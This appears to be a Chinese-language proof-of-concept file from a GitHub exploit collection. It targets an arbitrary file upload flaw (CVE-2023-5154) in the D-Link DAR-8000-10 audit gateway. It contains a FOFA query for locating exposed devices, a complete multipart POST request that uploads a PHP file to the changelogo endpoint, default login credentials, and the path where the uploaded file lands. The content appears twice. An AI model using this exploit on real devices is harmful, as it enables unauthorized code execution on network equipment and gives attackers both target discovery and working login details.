POC/wpoc/D-Link/D-Link_DAR-8000-10上网行为审计网关任意文件上传漏洞(CVE-2023-5154).md

## D-Link_DAR-8000-10上网行为审计网关任意文件上传漏洞(CVE-2023-5154)


## fofa
```
body="DAR-8000-10" && title="D-Link"
```
![image](https://github.com/wy876/POC/assets/139549762/0604d3f1-2325-4ef2-9ba3-cfbe182da07d)

## poc
```
POST /sysmanage/changelogo.php HTTP/1.1
Host: 
Cookie: PHPSESSID={登陆获取}
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/531.32.3 (KHTML, like Gecko) Version/4.1 Safari/531.32.3
Content-Type: multipart/form-data; boundary=---------------------------7e62f02f51878
Accept-Encoding: gzip, deflate
Content-Length: 326
Cache-Control: no-cache
Connection: close

-----------------------------7e62f02f51878
Content-Disposition: form-data; name="file_upload"; filename="phpinfo.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------7e62f02f51878
Content-Disposition: form-data; name="mode"

upload
-----------------------------7e62f02f51878--
```

需要登录
```
test/admin@123
admin/admin
```

![fb11b0e63a546ac5943d60d5237d8d77](https://github.com/wy876/POC/assets/139549762/24555069-a601-4295-864b-0ad930ce515e)

文件路径：
`/boot/web/upload/diylogo/phpinfo.php`
first commit 2025-03-04 23:12:57 +08:00			`## D-Link_DAR-8000-10上网行为审计网关任意文件上传漏洞(CVE-2023-5154)`


			`## fofa`
			```
			`body="DAR-8000-10" && title="D-Link"`
			```
			`![image](https://github.com/wy876/POC/assets/139549762/0604d3f1-2325-4ef2-9ba3-cfbe182da07d)`

			`## poc`
			```
			`POST /sysmanage/changelogo.php HTTP/1.1`
			`Host:`
			`Cookie: PHPSESSID={登陆获取}`
			`Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, /`
			`Accept-Language: zh-CN`
			`User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/531.32.3 (KHTML, like Gecko) Version/4.1 Safari/531.32.3`
			`Content-Type: multipart/form-data; boundary=---------------------------7e62f02f51878`
			`Accept-Encoding: gzip, deflate`
			`Content-Length: 326`
			`Cache-Control: no-cache`
			`Connection: close`

			`-----------------------------7e62f02f51878`
			`Content-Disposition: form-data; name="file_upload"; filename="phpinfo.php"`
			`Content-Type: application/octet-stream`

			`<?php phpinfo()?>`
			`-----------------------------7e62f02f51878`
			`Content-Disposition: form-data; name="mode"`

			`upload`
			`-----------------------------7e62f02f51878--`
			```

			`需要登录`
			```
			`test/admin@123`
			`admin/admin`
			```

			`![fb11b0e63a546ac5943d60d5237d8d77](https://github.com/wy876/POC/assets/139549762/24555069-a601-4295-864b-0ad930ce515e)`

			`文件路径：`
			`/boot/web/upload/diylogo/phpinfo.php`